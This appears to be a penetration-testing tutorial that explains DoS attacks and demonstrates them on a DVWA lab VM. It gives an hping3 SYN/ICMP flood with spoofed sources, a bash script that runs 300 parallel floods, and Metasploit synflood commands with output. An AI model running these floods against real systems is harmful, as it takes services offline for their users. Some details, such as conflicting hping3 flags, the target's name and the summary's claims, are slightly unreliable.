What is DoS Attack and why should you worry?
A Denial of Service (DoS) attack is a malicious effort to disrupt the functioning of something through an overwhelming amount of traffic.
Imagine being at a cafe with a friend, trying to have a conversation when all of a sudden, a group of people come in and start shouting. You can’t even hear each other, so you have no choice but to stop talking to your friend because the noise becomes too much. That’s what happens during DoS attacks.
They take advantage of network resource limits in order to exhaust bandwidth, CPU, and memory resources which make the service unavailable for legitimate users. The primary goal is to deny legitimate users access to the resource by interrupting or suspending services either temporarily or indefinitely.
The impact on businesses and individuals varies depending on the duration and intensity:
- Downtime: This is the most immediate consequence that occurs. For businesses this means loss of revenue especially for e-commerce sites, online platforms, and services that rely on online transactions.
- Financial Loss: Beyond just lost sales, businesses may incur additional costs related to mitigation efforts, increased cybersecurity measures, legal fees, and possibly paying ransoms if the DoS attack escalates into ransomware threats.
- Damage to Reputation: Repeated attacks can damage your company's reputation leading to loss of trust among users and customers which has long term consequences on customer loyalty and brand perception.
- Operational Disruption: DoS attacks can mess up everyday operations for both individuals and organizations by disrupting communication and access to critical online services.
- Resource Diversion: Responding and recovering from these types of attacks can divert resources from other important projects affecting overall productivity.
Performing DoS Attack Using hping3
We have Kali Linux which we will be our attack platform while we will perform the attack on DVWA which is a web application specifically designed to be vulnerable for educational purposes. We had already installed these VMs explained in a different article. Setup Lab Environment for CompTIA PenTest+ Exam (PT0-002)
Open a terminal on Kali Linux and perform a continuous ping towards your DVWA web server:
ping 10.10.1.12
On a different terminal we will use hping3 to initiate a flood of request towards the target host. For example:
hping3 -S --flood --rand-source --icmp <TARGET IP>
hping3 Invokes the hping3 tool, used for crafting and sending custom TCP/IP packets.
-S
: Specifies the TCP SYN flag, indicating a connection initiation.--flood
: Floods the target with packets at maximum speed.--rand-source
: Uses random source IP addresses for each packet, making the traffic harder to trace.<TARGET IP>
: Represents the IP address of the target to receive the flood of ICMP packets.
Now running a single instance of this command may not be sufficient to see any noticeable difference so we will create a shell script to send parallel request to our target host:
#!/bin/bash
# Usage: ./script.sh <target_ip> <number_of_executions>
TARGET_IP=$1
NUM_EXECUTIONS=$2
if [[ $# -lt 2 ]]; then
echo "Usage: $0 <target_ip> <number_of_executions>"
exit 1
fi
# Function to kill all child processes upon exit
function cleanup {
echo "Killing all hping3 processes..."
kill $(jobs -p)
exit
}
# Trap SIGINT (Ctrl+C) and SIGTERM signals to execute the cleanup function
trap cleanup SIGINT SIGTERM
# Execute hping3 in parallel
for ((i=1; i<=NUM_EXECUTIONS; i++))
do
hping3 -S --flood --rand-source --icmp $TARGET_IP > /dev/null 2>&1 &
done
# Wait for all child processes to finish
wait
Let's run 300 instances of flood command over our target host:
bash trigger_flood.sh 10.10.1.12 300
and we can now see the impact of this command on the ping output:
The increasing round trip time (RTT) for some packets, peaking at 1370 ms
, could suggest that the target VM is under some level of stress, possibly from processing the incoming pings or other operations. We could also see events when there was no response at all from the target host.
The web browser is also not accessible any more:
So you can understand the kind of impact such DoS attacks can bring as we didn't even target the explicit port number used by DVWA web server but just sending ICMP packets lead has brought down the web server,.
Performing DoS Attack Using Metasploit
We already covered how to use Metasploit to perform exploits un our previous article Exploit Vulnerabilities using Metasploit. We will again using metasploit to perform a DoS attack on our DVWA web server.
Open a terminal and start ping towards your target host. We will use this data to determine the impact of DoS attack by Metasploit:
ping 10.10.1.12
Open another terminal on your Kali Linux VM and launch the Metasploit console by typing msfconsole
. Use the search
command to find DoS-related modules
search dos tcp
Once you find a suitable module, use the use
command to select it. For example, use auxiliary/dos/tcp/synflood
.
msf6 > use auxiliary/dos/tcp/synflood msf6 auxiliary(dos/tcp/synflood) >
Use the show options
command to view the required parameters for the selected module.
msf6 auxiliary(dos/tcp/synflood) > show options Module options (auxiliary/dos/tcp/synflood): Name Current Setting Required Description ---- --------------- -------- ----------- INTERFACE no The name of the interface NUM no Number of SYNs to send (else unlimited) RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html RPORT 80 yes The target port SHOST no The spoofable source address (else randomizes) SNAPLEN 65535 yes The number of bytes to capture SPORT no The source port (else randomizes) TIMEOUT 500 yes The number of seconds to wait for new data
Set the target IP address using the set RHOSTS
command. You can also choose to setup other options based on your environment:
msf6 auxiliary(dos/tcp/synflood) > set RHOSTS 10.10.1.12 RHOSTS => 10.10.1.12
Once all options are configured, you can run the exploit
msf6 auxiliary(dos/tcp/synflood) > exploit [*] Running module against 10.10.1.12
On a different terminal you can observe changes in the ping output. In our case we are observing packet drops at frequent time intervals when exploit was running. We can observe the packet loss after closing the ping command:
The exploit initiates a SYN flood attack on the target system, Metasploitable. By flooding it with a massive number of SYN packets, the attacker aims to overload its network stack and resources. The resulting congestion leads to an inability to handle incoming connections, and causes packet loss—a state where genuine packets like ICMP Echo Requests (commonly used in ping tests) are discarded by the target. This high level of packet loss may result in disruption of network services and a significant percentage drop for such packages.
You can press Ctrl+C to stop the exploit execution:
[*] SYN flooding 10.10.1.12:80... ^C[-] Stopping running against current target... [*] Control-C again to force quit all targets. [*] Auxiliary module execution completed
Summary
This article is a complete look at Denial of Service (DoS) attacks. They are made to disrupt and render services useless to the people who should actually be using it. It provides insight into different types of DoS attacks, from volumetric, protocol, and application layer attacks. These each have their own unique traits, but all are very dangerous to businesses and individuals. Using Kali Linux, Metasploitable, and DVWA as examples we have tried to show how these things work in practice so you can see how important cybersecurity measures are in protecting them from these threats. The world we live in is becoming more interconnected every day which means there’s a lot more risk. Understanding DoS attacks will let companies bolster their defenses and safeguard against threats like this one.